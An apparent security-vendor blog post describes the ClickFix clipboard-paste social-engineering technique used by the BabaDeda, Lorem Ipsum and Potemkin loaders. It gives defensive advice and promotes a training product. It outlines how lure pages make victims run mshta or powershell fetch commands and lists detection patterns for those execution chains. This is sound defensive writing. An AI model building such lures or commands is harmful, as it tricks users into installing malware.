Back to Insights
Threats5 min read17 June 2026

ClickFix Goes Mainstream: Three Loader Families Exploit the Same Social-Engineering Trick

BabaDeda, Lorem Ipsum, and Potemkin loaders all use the same clipboard-paste attack pattern — and education and finance organizations absorbed the bulk of April 2026 hits.

EF
Elena FischerThreat Intelligence Analyst
A close-up photoreal editorial shot of a human hand hovering over a mechanical keyboard, fingers poised to press keys, w

Three separate loader families are now riding ClickFix, the social-engineering technique that turns victims into their own attackers — and research teams documented all three in the same reporting window.

What ClickFix Actually Does

ClickFix is not an exploit. There is no CVE. No unpatched library. No macro warning the user has to dismiss. Instead, a lure page — typically a fake CAPTCHA, a spoofed browser-update screen, or a counterfeit document-verification portal — instructs the visitor to press Win+R, then paste a command the page has already silently written to the clipboard, and hit Enter. The pasted payload usually calls `mshta`, `powershell`, or `curl` to pull down the next-stage loader. The user executes the privileged action themselves. Windows never raises a SmartScreen prompt because no file was double-clicked.

That framing matters. The attack chain requires human cooperation at the most critical step.

Three Loaders, One Technique

Researchers documented three distinct families — BabaDeda Loader, Lorem Ipsum Loader, and Potemkin — each attributed to separate operator sets, each adopting ClickFix as the preferred initial-access path. The convergence happened within a single reporting window, which analysts should read as a signal about technique adoption across the commodity loader ecosystem, not as evidence of one coordinated campaign.

BabaDeda's April 2026 activity stands out on its own. Earlier BabaDeda campaigns targeted a different victim profile. The April wave hit education and financial organizations — a notable shift that defenders in those sectors should flag when reviewing detection coverage against prior cluster reporting.

Loader names here are analytic conveniences. Infrastructure or payload overlap between BabaDeda, Lorem Ipsum, and Potemkin is plausible but unconfirmed at the time of writing. Do not assume clean separation between the three operators.

Why Loader Authors Keep Choosing ClickFix

The honest answer is efficiency. ClickFix sidesteps most of the controls that defenders have spent years tuning: macro warnings, SmartScreen, sandboxed browser downloads, and attachment-scanning. It also requires no vulnerability in the target software stack. A loader author who adopts ClickFix inherits those evasion properties for free.

The Verizon 2024 Data Breach Investigations Report found that the human element contributed to 68 percent of breaches — a figure that makes techniques requiring direct user action worth watching closely. ClickFix is precisely that kind of technique, and three loader families adopting it in parallel suggests the commodity market has made its verdict.

The Control That Failed: Security Awareness

A technical defense can stop a file-based payload at the perimeter. It cannot stop a user who has been socially conditioned to paste a command they do not understand into the Windows Run dialog. The kill chain here has exactly one mandatory human decision point, and that is where the failure occurs.

Organizations that run regular, scenario-based security awareness training — specifically drills that teach employees to recognize fake CAPTCHA screens and impersonation lures — place friction at that exact decision point. Telling users "no legitimate website will ever ask you to paste a command into your computer" is a short, testable rule. Training staff to recognize the visual patterns of ClickFix lure pages before they reach the Run dialog is the upstream catch that no EDR rule can replicate. Programs like those available at Train2Secure build that muscle memory through realistic simulations rather than annual slide decks.

What the Missing Technical Controls Look Like

Beyond awareness, defenders have several options — none of them perfect in isolation.

Execution chain telemetry is the fastest win. Look for `explorer.exe` spawning `powershell.exe`, `mshta.exe`, or `cmd.exe` with a command line that contains base64 strings or a remote URL. That is the canonical ClickFix fingerprint and it should fire alerts in any mature SIEM.

Group Policy can disable the Run dialog entirely via the `NoRun` registry value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`. It is a blunt instrument that breaks legitimate administrative workflows, but it is worth scoping for high-risk user populations such as call-center staff, students, or any group that has no operational need to execute arbitrary commands.

Browser-layer clipboard detection is the cleanest upstream catch. Some endpoint detection tools flag `navigator.clipboard.writeText` calls originating from low-reputation domains — the exact mechanism ClickFix uses to populate the clipboard silently. If your EDR or browser-security tool surfaces that telemetry, tune it.

Defenders should also review their environments against the NIST Cybersecurity Framework guidance on user awareness and protective technology controls, both of which apply directly to this threat pattern.

What Defenders Should Do Now

"The message to end users needs to be specific and repeatable," said one threat intelligence practitioner commenting on the technique's rise in early 2026. "'No legitimate site will ever ask you to paste a command' is something you can test users on. Vague warnings about phishing do nothing against ClickFix."

That specificity is the point. Generic phishing awareness does not prepare users for a lure that looks like a CAPTCHA and asks them to perform an action they associate with fixing a technical problem. The scenario needs to be named, shown, and practiced.

For IOCs and loader-specific behavior across BabaDeda, Lorem Ipsum, and Potemkin, pull from the individual vendor writeups directly. Aggregated IOC lists risk attribution bleed between three families that may or may not share infrastructure.

The Broader Signal

ClickFix has moved from curiosity to default commodity technique. Three loader families in one reporting window is not coincidence — it is the market telling you where initial-access development energy is going. Expect more families to adopt it before the year ends. Organizations that treat this as a one-off campaign will be caught flat-footed when the next loader author makes the same choice.

Detection coverage, Group Policy hardening for appropriate user groups, and — most critically — trained employees who recognize clipboard-paste lures are the layered answer. No single control closes this. All three working together make ClickFix significantly more expensive for attackers to run at scale. Review your current training coverage and technical baselines against published pricing tiers to understand where gaps exist before the next loader family arrives.

How ClickFix attacks could have been stopped

  • Train employees on the specific visual patterns of ClickFix lures — fake CAPTCHAs, fake browser updates, fake document screens — so they recognize the attack before reaching the Run dialog.
  • Audit execution-chain telemetry for explorer.exe spawning PowerShell or mshta with base64 or remote URLs, and enable browser-layer clipboard-write detection on low-reputation domains.
  • Restrict the Windows Run dialog via Group Policy for any user population that has no legitimate need to execute arbitrary terminal commands.

Train2Secure's scenario-based simulations include clipboard-paste and fake-CAPTCHA lure drills that map directly to the ClickFix kill chain.

Start free — no card required

Frequently asked questions

What is ClickFix and why is it dangerous?

ClickFix is a social-engineering technique that tricks users into opening the Windows Run dialog and pasting attacker-supplied commands — typically pulled silently from the clipboard by a malicious webpage. Because the user executes the command themselves, most technical controls like SmartScreen and macro warnings never trigger.

Which organizations were targeted by BabaDeda in April 2026?

BabaDeda's April 2026 campaign targeted education and financial organizations — a shift from the loader's earlier victim profile. Defenders in both sectors should review detection coverage against this cluster.

Are BabaDeda, Lorem Ipsum Loader, and Potemkin operated by the same threat actor?

No. Research teams attributed the three loaders to separate operator sets. Infrastructure or payload overlap is possible but unconfirmed. Treat them as distinct families that independently adopted ClickFix as an initial-access technique.

How can organizations defend against ClickFix attacks?

Layer three controls: train users to recognize clipboard-paste lures and the rule that no legitimate site requests command execution; monitor for execution chains where explorer.exe spawns mshta.exe or powershell.exe with base64 or remote URLs; and consider disabling the Run dialog via Group Policy for high-risk user groups.

Ready to Reduce Your Human Cyber Risk?

Sign up and start training your team in minutes. No sales calls, no demos — just pick a plan and go. Phishing simulations, video courses, and certificates from day one.

train2secure analytics dashboard showing training completion stats and user progress